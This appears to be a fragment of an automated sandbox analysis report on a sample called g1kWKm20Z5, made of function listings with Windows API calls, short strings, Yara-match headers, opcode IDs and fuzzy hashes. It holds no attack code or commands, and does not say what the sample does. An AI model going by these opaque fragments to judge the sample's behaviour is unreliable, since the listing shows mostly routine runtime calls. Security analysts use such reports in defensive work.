                                                                    • Opcode Fuzzy Hash: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                                    • Instruction Fuzzy Hash: 71A1F375E022159BEB50CFA9D9C07BEB3A4EB49314F19412AD855E3361E739DC028FA8
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00432EBD
                                                                      • Part of subcall function 00430E6C: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                                      • Part of subcall function 00432718: CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                                    • String ID: Ku^%$Ku^%
                                                                    • API String ID: 392924372-1067927601
                                                                    • Opcode ID: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                                    • Instruction ID: 62ef33d165420df4abe6194fc317c011647a9d43179361cb113ffb45af4e0bee
                                                                    • Opcode Fuzzy Hash: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                                    • Instruction Fuzzy Hash: 4AE12B71E006158BDF289E598D8657FB7B0AB0C314F24292BE511FA390D7BC9A418B8B
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0044C1F9,0043D4A6,0043CFF7), ref: 0044C210
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044C21E
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044C237
                                                                    • SetLastError.KERNEL32(00000000,0044C1F9,0043D4A6,0043CFF7), ref: 0044C289
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                                    • Instruction ID: c0e2f545b2bb83990020f58b3cafac4cb819fbf5ee5e5dfe57bf4abdb9a8f05a
                                                                    • Opcode Fuzzy Hash: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                                    • Instruction Fuzzy Hash: 5601F53260B6116EB69117B66CC656B2A88EF1137A328033FF920851F2FFD94C41919D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $^F
                                                                    • API String ID: 0-2072159057
                                                                    • Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                                    • Instruction ID: 9c600503ee011b5b01ea971114d00e1fe157cf1eb6220257661a77b4fb7b41e3
                                                                    • Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                                    • Instruction Fuzzy Hash: 7241C6B1600748AFDB35BF78CC45B6ABBAAEB84B10F10856AE511DF790D775E5408B80
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wcsrchr
                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                    • API String ID: 1752292252-4019086052
                                                                    • Opcode ID: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                                    • Instruction ID: b55bede8d45b761b400ac8ce0250aded4c8690036b953bdef2cda7eece1c3866
                                                                    • Opcode Fuzzy Hash: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                                    • Instruction Fuzzy Hash: A8010477A24A56213614156D9C0267797988B93BB6727402FFC44EB2C2EEECED02019E
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8F497764,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044394B
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044395D
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044397F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                                    • Instruction ID: 98d842734981b974643d07bc2e17aaafc6a7a08e37008b1518908caaa5ffc225
                                                                    • Opcode Fuzzy Hash: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                                    • Instruction Fuzzy Hash: DC01A771904655EBDB118F50CC05BAEB7B8FB44B51F000626E811A22D0EBF89A04CA99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                                    • Instruction ID: 8aab27407c0a82a01c0ac988981d35579ce087bbb9e55deaa5eb6bc71ee87661
                                                                    • Opcode Fuzzy Hash: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                                    • Instruction Fuzzy Hash: 6C51707990024DAAEF00EFE4D844AEEB7B8FF09710F11405BE815E7250EB74DA45CB6A
                                                                    APIs
                                                                    • GetFileType.KERNEL32(00446BF7,?,00000000,?), ref: 00446CF4
                                                                    • GetFileInformationByHandle.KERNEL32(00446BF7,?), ref: 00446D4E
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00446BF7,?,000000FF,00000000), ref: 00446DDC
                                                                    • __dosmaperr.LIBCMT ref: 00446DE3
                                                                    • PeekNamedPipe.KERNEL32(00446BF7,00000000,00000000,00000000,?,00000000), ref: 00446E20
                                                                      • Part of subcall function 00446999: __dosmaperr.LIBCMT ref: 004469CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                    • String ID:
                                                                    • API String ID: 1206951868-0
                                                                    • Opcode ID: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                                    • Instruction ID: 7fef5dbdd5f1ebb30aa965719069ce331059867e0b66cf3bcb9aaaf835df89e4
                                                                    • Opcode Fuzzy Hash: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                                    • Instruction Fuzzy Hash: 584160B5A00704AFEB24DFA5DC459ABBBF9FF89304B11452EF846D3610E734A845CB16
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %1.17g$,]{: }$null
                                                                    • API String ID: 4218353326-1793514501
                                                                    • Opcode ID: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                                    • Instruction ID: dfdaef210c9fde1e563ad86d0075ca4844e5c450f328af3dc752b2d50a02e017
                                                                    • Opcode Fuzzy Hash: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                                    • Instruction Fuzzy Hash: 68B1DFE2B042005BD7006A669C5162B65D98FD1359F09453FEF4AF33C2FA3EDE19829B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^4$^^4$~rjz
                                                                    • API String ID: 0-2511145224
                                                                    • Opcode ID: cb0dc4f94c1c179675eca45769f3c93bbdb24bff6a976fde1cfb2fc9678cba59
                                                                    • Instruction ID: 0c8c8d9a8597177023838940ed8ec232433aa460a65e207036a535b4732bd921
                                                                    • Opcode Fuzzy Hash: cb0dc4f94c1c179675eca45769f3c93bbdb24bff6a976fde1cfb2fc9678cba59
                                                                    • Instruction Fuzzy Hash: DB619C63E021A756FF34651C888D5BEB26E9B80F14F25C5A3F109FB29DC7A2C941CA53
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00459CCA,?,?,00000000,00000000,00000000,?), ref: 00459DE9
                                                                    • CatchIt.LIBVCRUNTIME ref: 00459ECF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CatchEncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 1435073870-2084237596
                                                                    • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                                    • Instruction ID: 680bccfe0e0854ffc158b5e00edb6862103a1416f9df0b4f366e0dcb6488795f
                                                                    • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                                    • Instruction Fuzzy Hash: 34416871900209EFDF15DF98CD82AAEBBB5FF48305F18805AF904672A2D3399D54DB58
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8), ref: 00456D3E
                                                                    • GetLastError.KERNEL32(?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8,?,^D,0044C1B0), ref: 00456D48
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,^D,0044C1B0,0044C294,00000003,0044069B,?,?,?,?,00000000,0045FB2F,004058C6), ref: 00456D70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                                    • Instruction ID: 0ecaf6013e36b0431d801e3916b08b76fdb95d3f1c140b132a01747a849ad822
                                                                    • Opcode Fuzzy Hash: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                                    • Instruction Fuzzy Hash: 04E012303C4204B7DB101B61DC06B593A789B10B56F540431FD0DA51E1EBF5A858954E
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(8F497764,00455523,00000000,?), ref: 004507AD
                                                                      • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00450A08
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00450A50
                                                                    • GetLastError.KERNEL32 ref: 00450AF3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                                    • Instruction ID: e52ebc46d8e9f13757024da4890b50ba647b118a1bf42f91cd2d0be3dbea7dc8
                                                                    • Opcode Fuzzy Hash: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                                    • Instruction Fuzzy Hash: A0D17BB9D00248AFDF15CFA8C8809EDBBB4FF09315F18816AE855E7352E734A946CB54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                                    • Instruction ID: 4fadf7dd59c53bd1b12e0029445d2e83e107cc747934abb9f5ec8e89f131d8d2
                                                                    • Opcode Fuzzy Hash: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                                    • Instruction Fuzzy Hash: 8C51F276A14202EFDB289F11D981BAA73A4EF18706F14452FEC0157292E73DEC49CB99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                                    • Instruction ID: a7f2c4688ec43d2a23ac8beb8ca83e3134fddb6ab0c13f52a90a8fe9f94a791d
                                                                    • Opcode Fuzzy Hash: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                                    • Instruction Fuzzy Hash: EE412AF2A00304AFD7249F79CC42B6AFBE8EB84756F10452FF551DB382D2B99A058784
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(83000000,8F497764,0000001C,8F497764,?,?,?), ref: 0044C7B6
                                                                    • __FindPESection.LIBCMT ref: 0044C7F3
                                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                                    • __FindPESection.LIBCMT ref: 0044C82D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                                                    • String ID:
                                                                    • API String ID: 1876002356-0
                                                                    • Opcode ID: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                                    • Instruction ID: 16c3c4676ac924f9bbc116e317de4c153b4417dc4f771cedf4f7c3d11fae8c19
                                                                    • Opcode Fuzzy Hash: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                                    • Instruction Fuzzy Hash: CF31B5B5E022159BFF54CBA9A9C07BE73A4EB09315F09007ADD41E7352E739DC018BA9
                                                                    APIs
                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,004481E1,00000001,?,004481E1,h5@,?,00000000), ref: 00450F57
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F64
                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F8A
                                                                    • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00450FB0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FilePointer$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 142388799-0
                                                                    • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                                    • Instruction ID: 1514e75016c253887b100742bd2e0aa0853bf3b84a7615600f3982ba0bc5b80c
                                                                    • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                                    • Instruction Fuzzy Hash: B1116636805219ABDF209F51CC48A9F3F7DFB00725F004115FC20922A1D7B19A40CAA5
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455DBC
                                                                    • GetLastError.KERNEL32(?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104,00446C37), ref: 00455DC6
                                                                    • __dosmaperr.LIBCMT ref: 00455DCD
                                                                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00455DF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 1391015842-0
                                                                    • Opcode ID: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                                    • Instruction ID: 83aad2bcbc88ad1b691cbbc28925ead7dadcf548e2ab308fdfae5f9a37bb2b5e
                                                                    • Opcode Fuzzy Hash: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                                    • Instruction Fuzzy Hash: 50F0A436200700AFDB205F67CC09E277BBDEF45361710842AF956C2521DB76EC14CB68
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001), ref: 00455E22
                                                                    • GetLastError.KERNEL32(?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104), ref: 00455E2C
                                                                    • __dosmaperr.LIBCMT ref: 00455E33
                                                                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455E5D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 1391015842-0
                                                                    • Opcode ID: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                                    • Instruction ID: 58d23dfaa7b1bff066b533c88cf6507f29fdd6be1c16f2e24496f8287ce13408
                                                                    • Opcode Fuzzy Hash: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                                    • Instruction Fuzzy Hash: 49F0A436200600AFDF205F72DC09E2B7BADEF44361714842AF959D2121DB75EC14CB58
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000), ref: 0045BD1F
                                                                    • GetLastError.KERNEL32(?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?,?,00450492,00443CFB), ref: 0045BD2B
                                                                      • Part of subcall function 0045BD7C: CloseHandle.KERNEL32(FFFFFFFE,0045BD3B,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?), ref: 0045BD8C
                                                                    • ___initconout.LIBCMT ref: 0045BD3B
                                                                      • Part of subcall function 0045BD5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0045BCF9,00459F57,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD70
                                                                    • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                                    • Instruction ID: a34e4e029ef2e4d5dd3ba3bcd054cc3c3a598788143b8b19420d5231d0b345e8
                                                                    • Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                                    • Instruction Fuzzy Hash: 0CF0F836140119BBCF221F959C08ADA3F3AEF493A1F044021FE09D5171D7B28864ABD9
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 004598A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ___except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3493665558-3733052814
                                                                    • Opcode ID: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                                    • Instruction ID: 4df6c2a030d07bf616ce91cf83237d0554f1a363a859cf179326f8a266afaebb
                                                                    • Opcode Fuzzy Hash: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                                    • Instruction Fuzzy Hash: 0E31C4B6400219EBCF269F51CC4096A7B65FF0A716B18419FFC5449323C73ACC66DB8A